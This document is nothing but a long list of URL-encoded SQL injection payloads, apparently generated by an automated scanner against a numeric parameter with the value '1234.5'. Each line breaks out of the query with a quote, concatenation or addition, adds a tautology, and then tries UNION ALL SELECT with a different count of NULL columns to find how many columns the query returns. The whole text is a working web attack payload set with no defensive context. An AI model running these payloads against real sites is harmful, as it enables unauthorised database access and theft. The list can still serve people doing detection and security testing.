1234.5%27%20WHERE%208726%3D8726%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%209034%3D9034%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%209801%3D9801%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%204092%3D4092%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%209431%3D9431%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%207906%3D7906%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%209028%3D9028%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%204280%3D4280%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%203993%3D3993%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%204157%3D4157%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%202091%3D2091%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%205923%3D5923%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%207373%3D7373%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%205809%3D5809%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%204773%3D4773%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%207304%3D7304%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%208748%3D8748%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20WHERE%209350%3D9350%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20%7C%7C%20%28SELECT%209934%20FROM%20DUAL%20WHERE%207539%3D7539%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205520%20FROM%20DUAL%20WHERE%208612%3D8612%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205061%20FROM%20DUAL%20WHERE%204883%3D4883%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202413%20FROM%20DUAL%20WHERE%204168%3D4168%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205686%20FROM%20DUAL%20WHERE%205442%3D5442%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209567%20FROM%20DUAL%20WHERE%201048%3D1048%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207071%20FROM%20DUAL%20WHERE%203148%3D3148%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205105%20FROM%20DUAL%20WHERE%206876%3D6876%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208563%20FROM%20DUAL%20WHERE%206357%3D6357%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203550%20FROM%20DUAL%20WHERE%205802%3D5802%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201937%20WHERE%203186%3D3186%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203123%20WHERE%204398%3D4398%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208715%20WHERE%208663%3D8663%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205808%20WHERE%207114%3D7114%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204854%20WHERE%203301%3D3301%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201420%20WHERE%208626%3D8626%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202291%20WHERE%209656%3D9656%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207613%20WHERE%205866%3D5866%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203161%20WHERE%203566%3D3566%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204013%20WHERE%204756%3D4756%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%204472%20FROM%20DUAL%20WHERE%202984%3D2984%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209247%20FROM%20DUAL%20WHERE%204321%3D4321%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206147%20FROM%20DUAL%20WHERE%201139%3D1139%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207643%20FROM%20DUAL%20WHERE%203167%3D3167%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207466%20FROM%20DUAL%20WHERE%201691%3D1691%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 